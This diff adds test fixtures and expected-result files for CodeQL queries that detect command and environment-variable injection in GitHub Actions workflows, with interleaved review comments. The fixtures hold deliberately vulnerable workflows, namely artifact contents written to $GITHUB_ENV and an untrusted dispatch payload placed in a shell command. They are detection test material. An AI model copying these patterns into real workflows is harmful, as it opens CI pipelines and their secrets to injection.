+ check.protects(sink.getNode().asExpr(), event, ["command-injection", "code-injection"])
+ )
 select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml
new file mode 100644
index 000000000000..2c2480f5353c
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml
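Review bot: The added exclusion lets a `ControlCheck` of category `"code-injection"` suppress a command-injection finding, and nothing in the query records why the two categories are treated as interchangeable for this sink; a comment such as `// a check that blocks code injection at this sink also blocks command injection through it` above the `not exists` would make the intent auditable, if that is indeed the reasoning. Style: the new `import codeql.actions.security.ControlChecks` sits after `import CommandInjectionFlow::PathGraph`, splitting the `codeql.actions.security` imports; placing it directly under `CommandInjectionQuery` keeps them grouped.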
@@ -0,0 +1,81 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + if: ${{ github.repository_owner == 'cloudflare' }} + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Put PR and workflow ID on the environment" + uses: actions/github-script@v7 + with: + script: | + // Copied from .github/extract-pr-and-workflow-id.js + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + for (const artifact of allArtifacts.data.artifacts) { + // Extract the PR number from the artifact name + const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); + if (match) { + const packageName = match[1].toUpperCase(); + require("fs").appendFileSync( + process.env.GITHUB_ENV, + `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + + `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` + ); + } + } + + - name: "Download runtime versions" + # Regular `actions/download-artifact` doesn't support downloading + # artifacts from another workflow + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + + - name: "Download pre-release report" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: prerelease-report.md + + - name: "Put pre-release report on the environment" + id: prerelease_report + run: | + { + echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + + - name: "Comment on PR with Wrangler link" + uses: marocchino/sticky-pull-request-comment@v2 + with: + number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} + message: | + ${{ env.PRERELEASE_REPORT }} + + --- + + ${{ 
env.RUNTIME_VERSIONS }} + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml new file mode 100644 index 000000000000..3a0c4cc91b82 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml 
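Review bot: test11.yml differs from test12.yml only in the job-level `if: ${{ github.repository_owner == 'cloudflare' }}`, and the updated `EnvVarInjectionCritical.expected` gains `#select` rows for test12 but none for test11, so that owner comparison is being accepted as a control protecting the `$GITHUB_ENV` writes fed by `dawidd6/action-download-artifact`. Under a `workflow_run` trigger the downloaded artifact still originates from the upstream run, which an external pull request can produce, so comparing `repository_owner` does not establish the artifact's provenance; whether `ControlChecks` is meant to count it is decided in code outside this diff and is worth confirming. Either way the fixture should state what it exercises, e.g. `# Expected: no critical alert — the job-level repository_owner check is treated as a control for this sink`, so a later reader does not mistake the missing expectation for an oversight.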
@@ -0,0 +1,80 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Put PR and workflow ID on the environment" + uses: actions/github-script@v7 + with: + script: | + // Copied from .github/extract-pr-and-workflow-id.js + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + for (const artifact of allArtifacts.data.artifacts) { + // Extract the PR number from the artifact name + const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); + if (match) { + const packageName = match[1].toUpperCase(); + require("fs").appendFileSync( + process.env.GITHUB_ENV, + `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + + `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` + ); + } + } + + - name: "Download runtime versions" + # Regular `actions/download-artifact` doesn't support downloading + # artifacts from another workflow + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + + - name: "Download pre-release report" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: prerelease-report.md + + - name: "Put pre-release report on the environment" + id: prerelease_report + run: | + { + echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + + - name: "Comment on PR with Wrangler link" + uses: marocchino/sticky-pull-request-comment@v2 + with: + number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} + message: | + ${{ env.PRERELEASE_REPORT }} + + --- + + ${{ env.RUNTIME_VERSIONS }} + 
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 359275aef43d..cbd17161942b 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -20,6 +20,14 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | 
provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -61,6 +69,14 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho 
"pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -84,3 +100,6 @@ subpaths | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index eaa9fed4c617..e780af4107dd 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -20,6 +20,14 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | 
provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -61,5 +69,13 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | subpaths #select 
diff --git a/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml b/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml new file mode 100644 index 000000000000..d87c3cad0068 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml 
@@ -0,0 +1,196 @@ +name: "Run Dagger pipeline" +description: "Runs a given dagger pipeline" +inputs: + subcommand: + description: "Subcommand for airbyte-ci" + required: true + context: + description: "CI context (e.g., pull_request, manual)" + required: true + github_token: + description: "GitHub token" + required: false + dagger_cloud_token: + description: "Dagger Cloud token" + required: false + docker_hub_username: + description: "Dockerhub username" + required: false + docker_hub_password: + description: "Dockerhub password" + required: false + options: + description: "Options for the subcommand" + required: false + production: + description: "Whether to run in production mode" + required: false + default: "True" + report_bucket_name: + description: "Bucket name for CI reports" + required: false + default: "airbyte-ci-reports-multi" + gcp_gsm_credentials: + description: "GCP credentials for GCP Secret Manager" + required: false + default: "" + gcp_integration_tester_credentials: + description: "GCP credentials for integration tests" + required: false + default: "" + git_repo_url: + description: "Git repository URL" + default: https://github.com/airbytehq/airbyte.git + required: false + git_branch: + description: "Git branch to checkout" + required: false + git_revision: + description: "Git revision to checkout" + required: false + slack_webhook_url: + description: "Slack webhook URL" + required: false + metadata_service_gcs_credentials: + description: "GCP credentials for metadata service" + required: false + metadata_service_bucket_name: + description: "Bucket name for metadata service" + required: false + default: "prod-airbyte-cloud-connector-metadata-service" + sentry_dsn: + description: "Sentry DSN" + required: false + spec_cache_bucket_name: + description: "Bucket name for GCS spec cache" + required: false + default: "io-airbyte-cloud-spec-cache" + spec_cache_gcs_credentials: + description: "GCP credentials for GCS spec cache" + required: false + 
gcs_credentials: + description: "GCP credentials for GCS" + required: false + ci_job_key: + description: "CI job key" + required: false + s3_build_cache_access_key_id: + description: "Gradle S3 Build Cache AWS access key ID" + required: false + s3_build_cache_secret_key: + description: "Gradle S3 Build Cache AWS secret key" + required: false + airbyte_ci_binary_url: + description: "URL to airbyte-ci binary" + required: false + default: https://connectors.airbyte.com/airbyte-ci/releases/ubuntu/latest/airbyte-ci + python_registry_token: + description: "Python registry API token to publish python package" + required: false + is_fork: + description: "Whether the PR is from a fork" + required: false + default: "false" + max_attempts: + description: "Number of attempts at running the airbyte-ci command" + required: false + default: 1 + retry_wait_seconds: + description: "Number of seconds to wait between retry attempts" + required: false + default: 60 + +runs: + using: "composite" + steps: + - name: Get start timestamp + id: get-start-timestamp + shell: bash + run: echo "start-timestamp=$(date +%s)" >> $GITHUB_OUTPUT + - name: Docker login + id: docker-login + uses: docker/login-action@v3 + if: ${{ inputs.docker_hub_username != '' && inputs.docker_hub_password != '' }} + with: + username: ${{ inputs.docker_hub_username }} + password: ${{ inputs.docker_hub_password }} + - name: Install Airbyte CI + id: install-airbyte-ci + uses: ./.github/actions/install-airbyte-ci + with: + airbyte_ci_binary_url: ${{ inputs.airbyte_ci_binary_url }} + is_fork: ${{ inputs.is_fork }} + - name: Run airbyte-ci + id: run-airbyte-ci + uses: nick-fields/retry@v3 + env: + CI: "True" + CI_GIT_USER: ${{ github.repository_owner }} + CI_PIPELINE_START_TIMESTAMP: ${{ steps.get-start-timestamp.outputs.start-timestamp }} + PULL_REQUEST_NUMBER: ${{ github.event.pull_request.number }} + # Next environment variables are workflow inputs based and can be set with empty values if the inputs are not required 
and passed + CI_CONTEXT: "${{ inputs.context }}" + CI_GIT_BRANCH: ${{ inputs.git_branch || github.head_ref }} + CI_GIT_REPO_URL: ${{ inputs.git_repo_url }} + CI_GIT_REVISION: ${{ inputs.git_revision || github.sha }} + CI_GITHUB_ACCESS_TOKEN: ${{ inputs.github_token }} + CI_JOB_KEY: ${{ inputs.ci_job_key }} + CI_REPORT_BUCKET_NAME: ${{ inputs.report_bucket_name }} + DAGGER_CLOUD_TOKEN: "${{ inputs.dagger_cloud_token }}" + DOCKER_HUB_PASSWORD: ${{ inputs.docker_hub_password }} + DOCKER_HUB_USERNAME: ${{ inputs.docker_hub_username }} + GCP_GSM_CREDENTIALS: ${{ inputs.gcp_gsm_credentials }} + GCP_INTEGRATION_TESTER_CREDENTIALS: ${{ inputs.gcp_integration_tester_credentials }} + GCS_CREDENTIALS: ${{ inputs.gcs_credentials }} + METADATA_SERVICE_BUCKET_NAME: ${{ inputs.metadata_service_bucket_name }} + METADATA_SERVICE_GCS_CREDENTIALS: ${{ inputs.metadata_service_gcs_credentials }} + PRODUCTION: ${{ inputs.production }} + PYTHON_REGISTRY_TOKEN: ${{ inputs.python_registry_token }} + PYTHON_REGISTRY_URL: ${{ inputs.python_registry_url }} + S3_BUILD_CACHE_ACCESS_KEY_ID: ${{ inputs.s3_build_cache_access_key_id }} + S3_BUILD_CACHE_SECRET_KEY: ${{ inputs.s3_build_cache_secret_key }} + SENTRY_DSN: ${{ inputs.sentry_dsn }} + SLACK_WEBHOOK: ${{ inputs.slack_webhook_url }} + SPEC_CACHE_BUCKET_NAME: ${{ inputs.spec_cache_bucket_name }} + SPEC_CACHE_GCS_CREDENTIALS: ${{ inputs.spec_cache_gcs_credentials }} + with: + shell: bash + max_attempts: ${{ inputs.max_attempts }} + retry_wait_seconds: ${{ inputs.retry_wait_seconds }} + # 360mn > 6 hours: it's the GitHub runner max job duration + timeout_minutes: 360 + command: | + airbyte-ci --disable-update-check --disable-dagger-run --is-ci --gha-workflow-run-id=${{ github.run_id }} ${{ inputs.subcommand }} ${{ inputs.options }} + - name: Stop Engine + id: stop-engine + if: always() + shell: bash + run: | + mapfile -t containers < <(docker ps --filter name="dagger-engine-*" -q) + if [[ "${#containers[@]}" -gt 0 ]]; then + # give 5mn to the 
Dagger Engine to push cache data to Dagger Cloud + docker stop -t 300 "${containers[@]}"; + fi + + - name: Collect dagger engine logs + id: collect-dagger-engine-logs + if: always() + uses: jwalton/gh-docker-logs@v2 + with: + dest: "./dagger_engine_logs" + images: "registry.dagger.io/engine" + + - name: Tar logs + id: tar-logs + if: always() + shell: bash + run: tar cvzf ./dagger_engine_logs.tgz ./dagger_engine_logs + + - name: Upload logs to GitHub + id: upload-dagger-engine-logs + if: always() + uses: actions/upload-artifact@v4 + with: + name: ${{ github.job }}_dagger_engine_logs.tgz + path: ./dagger_engine_logs.tgz + retention-days: 7 diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml new file mode 100644 index 000000000000..6a449e24cf02 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml 
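Review bot: `PYTHON_REGISTRY_URL: ${{ inputs.python_registry_url }}` in the `env:` block of the "Run airbyte-ci" step references an input that the `inputs:` section never declares (only `python_registry_token` is present), so it presumably always expands to an empty string; if this fixture is meant to mirror the upstream composite action, either declare `python_registry_url` next to `python_registry_token` or drop the line. Separately, `inputs.options` is interpolated unquoted into the same `command:` as `inputs.subcommand`, so it is an equivalent shell-injection sink even though the new expected rows only record `subcommand`; a one-line comment above `command:` would save the next reader from wondering why only one of them is reported, e.g. `# both subcommand and options are expanded inline into the shell command; only subcommand receives untrusted data from test1.yml`.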
@@ -0,0 +1,63 @@ +name: Finalize connector rollout + +on: + repository_dispatch: + types: [finalize-connector-rollout] + workflow_dispatch: + inputs: + connector_name: + description: "Connector name" + required: true + action: + description: "Action to perform" + required: true + options: ["promote", "rollback"] +jobs: + finalize_rollout: + name: Finalize connector rollout + runs-on: connector-publish-large + env: + ACTION: ${{ github.event_name == 'workflow_dispatch' && github.event.inputs.action || github.event.client_payload.action }} + steps: + - name: Check action value + run: | + if [[ "${ACTION}" != "promote" && "${ACTION}" != "rollback" ]]; then + echo "Invalid action: ${ACTION}" + exit 1 + fi + shell: bash + - name: Checkout Airbyte + uses: actions/checkout@v4 + - name: Promote {{ github.event.client_payload.connector_name }} release candidate + id: promote-release-candidate + if: ${{ env.ACTION == 'promote' }} + uses: ./.github/actions/run-airbyte-ci + with: + context: "manual" + dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }} + docker_hub_password: ${{ secrets.DOCKER_HUB_PASSWORD }} + docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }} + gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }} + gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + github_token: ${{ secrets.GITHUB_TOKEN }} + metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }} + slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }} + subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --promote-release-candidate" + - name: 